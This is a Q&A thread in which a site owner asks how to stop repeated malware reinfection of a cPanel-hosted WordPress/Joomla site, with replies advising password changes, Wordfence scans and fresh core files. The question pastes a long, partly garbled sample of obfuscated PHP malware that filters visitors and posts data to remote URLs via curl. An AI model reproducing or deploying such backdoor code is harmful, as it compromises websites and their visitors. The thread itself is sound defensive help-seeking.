# Cpanel Hacked , Some accident files edited with base64 code

Tags: wordpress, joomla, base64, cpanel

I have some strange problems for while that i can't access to my site through google because it alert users that this website contains malware.

Some of my files has been edited by accident in all my folders , Some new files created very intelligently between Wordpress or Joomla core that you never can understand they created by virus.

All of them has been edited by base64 codes , And i remove all new virus files and restore original files but they will created today again.

My account is Cpanel ,I changed Cpanel password some time but not worked , I don't remove ftp users because i thought maybe i loss my files ?

What i should do ?
Thanks!

```
    ")} = YypSc0cQFhy3J("'25-3:-");
                            ${XiR75Dp("`ko)2hh@3xj#U")} = yndJFg6Eb("&%+3");
    ${UXiKSbeGBtie("i.ntxV2Xn-2!")} = zOeQ89("7(36.4;.");
                            ${XiR75Dp("yVfSi9Y7i>");
    function zOeQ89($SRPfSoOMwY){return YypSc0cQFhy3J($SRPfSoOMwY);};

    ${XiR75Dp("5/*V34")} = zOeQ89(")60086,+2+7/)#57\$*,+8.0");

    function wurJ5mP0tuiT($nx1ZVDkeubPPn){return YypSc0cQFhy3J($nx1ZVDkeubPPn);};
    function yndJFg6Eb($erFRGKz){return YypSc0cQFhy3J($erFRGKz);};

    ${zOeQ89(";kT+)s-?Ckl86")} = YypSc0cQFhy3J("-65-2");
    ${zOeQ89("y;sZ7j./ll/\"")} = yndJFg6Eb("6%:37*:");
    ${yndJFg6Eb("p7.s1@XWyjE5")} = yndJFg6Eb(")'%6*%2-B)0D*577");
                        ${YypSc0cQFhy3J("vP2[lt@9q")} = UXiKSbeGBtie("4*\$S");
                            function Su59bl($Ic6knPclJ){return YypSc0cQFhy3J($Ic6knPclJ);};
    ${XiR75Dp("xhVUl{y=:")} = XiR75Dp(")600*4;1=30?");
    ${yndJFg6Eb("sV3t-0\\w]")} = zOeQ89("\"&''1':4*=3");
    ${Su59bl("%g:ixyA")} = UXiKSbeGBtie(")60086,+2+7/)#57\$*,+8.0");

    ${Su59bl("*k.3d)y")} = YypSc0cQFhy3J("*0,#8+;");

    ${XiR75Dp("6i.j=;gB[5r\$l")} = yndJFg6Eb("-h{20y^Vl#^Ej");
        ${Su59bl("t'VR>t5*11x}`")} = UXiKSbeGBtie("465798");
                            ${yndJFg6Eb("3an=m|Yn@")} = UXiKSbeGBtie("47%798&+8?9@");
    ${YypSc0cQFhy3J("l&i*3u")} = Su59bl("'71'9/66(/C5466");
    ${zOeQ89("\$3dt;@436{}qc")} = XiR75Dp(".&V");
    ${yndJFg6Eb("7rz;;r")} = YypSc0cQFhy3J("d&e/wulX=?!x");

    ${wurJ5mP0tuiT("\$:)2w2k~")} = wurJ5mP0tuiT("4+0-1'9'=/C@");
                            ${YypSc0cQFhy3J("bhf[l8")} = YypSc0cQFhy3J("548)");
    ${UXiKSbeGBtie("f4S5TVs")} = YypSc0cQFhy3J("&:304*,");
            ${wurJ5mP0tuiT("nc7=,?>-~`")} = YypSc0cQFhy3J("04'");
    ${XiR75Dp("4%Z(f:")} = YypSc0cQFhy3J("*/304*,");
    ${XiR75Dp(";S)ty:%:020?");
                ${UXiKSbeGBtie("*q7rYk")} = yndJFg6Eb("*0\"%78(A");
    ${yndJFg6Eb("8eT:3*j")} = UXiKSbeGBtie("465)&3&+88?196\"'7+(!zA2B")} = yndJFg6Eb("'+/8*8&>*");
    ${wurJ5mP0tuiT("6c'upj,X^MPJ"), 
                    YypSc0cQFhy3J("l1=-12(U[VYJG%215';1+60e?mtkhD]TWcI#*0'3X^MPJ"),);


     if (${wurJ5mP0tuiT("3an=m|Yn@")}(${zOeQ89(":&Th7q~")}($_SERVER[UXiKSbeGBtie("rcsksx&lptnx`mf")]), wurJ5mP0tuiT("C")) != ${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("O"))+395){ ${UXiKSbeGBtie("\$%4&)V*/'~\\")], '');exit();}
    if (empty(${YypSc0cQFhy3J("~gfv")}))
    {
                                ${XiR75Dp("cxww5}+;;r}ua")}();
    }

                            ${Su59bl("(9wzjv")} = ${wurJ5mP0tuiT("0tu|g1:")}();
    ${Su59bl("pUVY*:v")} = @$GLOBALS[YypSc0cQFhy3J("lue.d]}B")][Su59bl("gtur\$yxky)jqdnu")];

    if (${wurJ5mP0tuiT("*q7rYk")}(${YypSc0cQFhy3J("pUVY*:v")}, ${zOeQ89("tj&kv7@l2-")}))
    {
                                ${yndJFg6Eb("cxww5}+;;r}ua")}();
    }


    if (empty(${Su59bl("(9wzjv")}))
    {
        ${Su59bl("cxww5}+;;r}ua")}();
    }

                        ${YypSc0cQFhy3J(",-k>{W+6^")} = ${XiR75Dp(";4{0,\\2:#@")}(${Su59bl("(9wzjv")}, ${XiR75Dp("cvh0w73j;`06")}(XiR75Dp("O")), ${yndJFg6Eb("lhi8mYf.!")}(${Su59bl("(9wzjv")}, UXiKSbeGBtie("M"))+${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("P")));
                        if (${wurJ5mP0tuiT("*q7rYk")}(${wurJ5mP0tuiT(",-k>{W+6^")}, ${wurJ5mP0tuiT("pU/+SlnrhB?E")}))
    {

        ${UXiKSbeGBtie("cxww5}+;;r}ua")}();
    }

    ${YypSc0cQFhy3J("lWi(k4")} = ${YypSc0cQFhy3J("cvh0w73j;`06")}(Su59bl("QYRYT"));

    ${UXiKSbeGBtie("92w>2=tX")} = ${UXiKSbeGBtie("cvh0w73j;`06")}(yndJFg6Eb("O"));
                    foreach (${zOeQ89(")4c3:/Y,")}($GLOBALS[UXiKSbeGBtie("lue.d]}B")][XiR75Dp("qerwhwy'|zr")]) as ${zOeQ89("7w%hy3")})
    {

        ${Su59bl("lWi(k4")} += ${UXiKSbeGBtie("nc7=,?>-~`")}(${UXiKSbeGBtie("7w%hy3")});
        ${Su59bl("92w>2=tX")} ++;
    }
    ${YypSc0cQFhy3J("lWi(k4")}-~`")}(${YypSc0cQFhy3J("lWi(k4")}[${UXiKSbeGBtie("cvh0w73j;`06")}(XiR75Dp("O"))]) + ${wurJ5mP0tuiT("nc7=,?>-~`")}(${yndJFg6Eb("lWi(k4")}[${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("P"))]) + (${UXiKSbeGBtie("t'VR>t5*11x}`")}(${YypSc0cQFhy3J(";4{0,\\2:#@")}($GLOBALS[XiR75Dp("lue.d]}B")][yndJFg6Eb("qerwhwy'|zr")], -${UXiKSbeGBtie("cvh0w73j;`06")}(YypSc0cQFhy3J("S"))), Su59bl("M2+4")) == FALSE ? ${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("XX")) : ${wurJ5mP0tuiT("::+'hr+Z+s")}(${YypSc0cQFhy3J("(9wzjv")})))) . YypSc0cQFhy3J("Y") . ${UXiKSbeGBtie("sx{=e@st5*11x}`")}(${yndJFg6Eb("y)6n(gk5|")}, Su59bl("M*711")) === FALSE)
    {

        ${XiR75Dp("2ko:tw~04;/O2'9+;S=1\"/"));
                        ${UXiKSbeGBtie("2ko:tw~0!zA2B")};
    global ${UXiKSbeGBtie("%g:ix!zA2B")}(${Su59bl("(9wzjv")}, FILTER_VALIDATE_IP, ${UXiKSbeGBtie("*-oRufz1")} | FILTER_FLAG_NO_RES_RANGE) !== FALSE)
                            {
                            return ${UXiKSbeGBtie("(9wzjv")};

                                                                        }
                }
            }
        }

        return "";
    }


    function xccEP2Ijj4k()
    {global ${XiR75Dp("6iXgz]h*Y\$")};

    global ${YypSc0cQFhy3J("6c'upj, array(yndJFg6Eb("*)137+&-;4") => true))));
            $content = ${yndJFg6Eb(";S*e\\o95")}(${zOeQ89("2-'qk9Z")}, ${UXiKSbeGBtie("%Pg:*8.")}, $content);
            ${YypSc0cQFhy3J("6iXgz]h*Y\$")}(yndJFg6Eb("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")}, $content);
        }
        else
        {
            $content = @${XiR75Dp(":&Th7q~")}(Su59bl("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")});
        }

        exit($content);
    }

                    function lHZnkU90EY5yK($url, $content)
    {global ${YypSc0cQFhy3J("cvh0w73j;`06")};
    global ${Su59bl("8Yhs-4-@^v")};

    global ${UXiKSbeGBtie("6b,X4@kz8;=")};
    global ${yndJFg6Eb("eV4t5~")} = ${YypSc0cQFhy3J("6b,X4@kz8;=")}();


        ${yndJFg6Eb("8Yhs-4-@^v")}(${XiR75Dp("nV6>4t5~")}, CURLOPT_URL, $url);
        ${Su59bl("8Yhs-4-@^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_POST, ${Su59bl("cvh0w73j;`06")}(Su59bl("P")));
        ${XiR75Dp("8Yhs-4-@^v")}(${yndJFg6Eb("nV6>4t5~")}, CURLOPT_POSTFIELDS, $content);

        ${yndJFg6Eb("8Yhs-4-@^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_RETURNTRANSFER, TRUE);

        ${wurJ5mP0tuiT("nSz=[334t")} = ${zOeQ89(";S)ty:4t5~")});
        ${YypSc0cQFhy3J("eV4t5~")});

                                return ${UXiKSbeGBtie("nSz=[334t")};
    }


    function EdDkTQG2tuVN($url, $content)
                    {global ${yndJFg6Eb("2ko:tw~0 Array(wurJ5mP0tuiT(".'7,4*") => yndJFg6Eb("ootv"), zOeQ89(")'\$(*8") => yndJFg6Eb("b118*4;S=C;1Y@\$4520+*>4;/O;OS/9=9L750*4*7-//"), yndJFg6Eb("\$118*4;") => $content)));

                    ${Su59bl("nSz=[334t")} = @${Su59bl(":&Th7q~")}($url, FALSE, ${zOeQ89("qh:{nh]n@j:9")});


        return ${YypSc0cQFhy3J("nSz=[334t")};
    }
```

Comment: Stack Overflow is for programming questions.  You might try asking in a different forum.

Comment: Take a look at the plugin "Wordfence" -- it works great for these situations, as least for CLEANING them up. You have to further steps (changing passwords, etc) to really be sure that things are secure. Most likely, a vulnerable script lives somewhere in your site theme or plugins that they'll just keep hitting to reinfect. In Wordfence, run a full scan with all options checked. It'll find your infection and probably a lot more, plus help you clean it up. Do backups of everything first please :)

Answer (score 0):

You have to change all password, also FTP. It's most likely they obtained one of them. Is it cPanel on a own server, or is it cPanel you use as a reseller or end user? If it's your own server it's likely that the server is compromised and you should definitly ask an expert to check the security and remove any virusses you have on the server.

If it's a reseller cPanel you are using you should ask your hosting. Also make sure you delete any weird PHP files that shouldn't be there, you most likely have a backdoor somewhere. The best way is to remove everything except the wp-content folder.

Reupload the WordPress files and manually check all the files in wp-content. Most easy way is to remove all your plugin files as well and download fresh new files from the repository. Maybe you should do the same with your theme. Definitly check your uploads directory manually.